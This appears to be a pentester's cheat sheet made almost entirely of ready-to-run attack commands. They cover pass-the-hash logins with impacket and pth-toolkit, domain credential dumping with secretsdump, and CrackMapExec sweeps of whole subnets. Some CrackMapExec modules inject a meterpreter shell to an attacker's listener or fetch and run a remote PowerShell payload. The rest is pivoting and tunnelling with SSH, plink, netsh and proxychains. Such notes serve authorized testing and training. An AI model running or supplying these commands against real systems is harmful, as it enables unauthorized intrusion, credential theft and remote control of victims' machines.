Syntax examples taken mostly from this awesome blog
https://blog.ropnop.com/practical-usage-of-ntlm-hashes/
Several ways and tools you can run psexec or use hashes...
https://github.com/byt3bl33d3r/pth-toolkit
pth-winexe -U cscou/kbryant%asdfasd21341241234asdasd:23423sdfasdf1234 //ordws01.cscou.lab cmd.exe
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
https://github.com/CoreSecurity/impacket
psexec.py Administrator:[email protected]
psexec.py BUFU/spice1:[email protected]
psexec.py [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
smbexec.py BUFU/spice1:[email protected] (doesnt drop a binary)
wmiexec.py BUFU/blegit:[email protected]
secretsdump.py -dc-ip IP AD\administrator@domain -use-vss
secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\[email protected]
https://github.com/byt3bl33d3r/CrackMapExec
crackmapexec.py 10.10.10.0/24 -d BUFU -u silverback -p g0rilla -x whoami
crackmapexec.py 10.10.10.0/24 -u tnutty -H 24cf234234908098092834234234
crackmapexec 10.10.10.10 -u Administrator -p ak47inth3fr33zer --shares
crackmapexec smb -L
crackmapexec smb -M name_module -o VAR=DATA
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
crackmapexec mimikatz --server http --server-port 80
nmap -sU -sS --script smb-psexec.nse --script-args=smbuser=<username>,smbpass=<password>[,config=<config>] -p U:137,T:139 <host>
apt-get install freerdp-x11
xfreerdp /u:crap /d:win2012 /pth:HASH /v:IP
ssh -D8080 [user]@[host]
ssh -N -f -D 9000 [user]@[host]
-f : ssh in background
-N : do not execute a remote command
Config file: /etc/proxychains.conf
[ProxyList]
socks4 localhost 8080
Set the SOCKS4 proxy then proxychains whatever tool
netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110
plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389 --> exposes the RDP port of the machine in the port 3390 of the SSH Server
plink -l root -pw mypassword 192.168.18.84 -R
plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]https://www.offensive-security.com/metasploit-unleashed/portfwd/ forward remote port to local address
meterpreter > portfwd add –l 3389 –p 3389 –r 172.16.194.141
kali > rdesktop 127.0.0.1:3389
or
portfwd list
portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445
or
run autoroute -s 192.168.57.0/24
use auxiliary/server/socks4a
ssh -D 127.0.0.1:1080 -p 22 user1@IP1
Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2
Add socks4 127.0.0.1 1081 in /etc/proxychains.conf
proxychains commands target
ssh -R 9000:localhost:8001 username@hostname
ssh -R 2222:localhost:22 username@hostname - SSH
ssh -R 2223:localhost:5902 username@hostname - VNC
autossh -M 20000 -f -R 2222:localhost:80 username@hostname
https://sshuttle.readthedocs.io/en/stable/usage.html
To sshuttle into an internal network and forward all traffic
sshuttle -r [email protected] 10.1.1.0/24 -vNH
https://chryzsh.gitbooks.io/pentestbook/content/port_forwarding_and_tunneling.html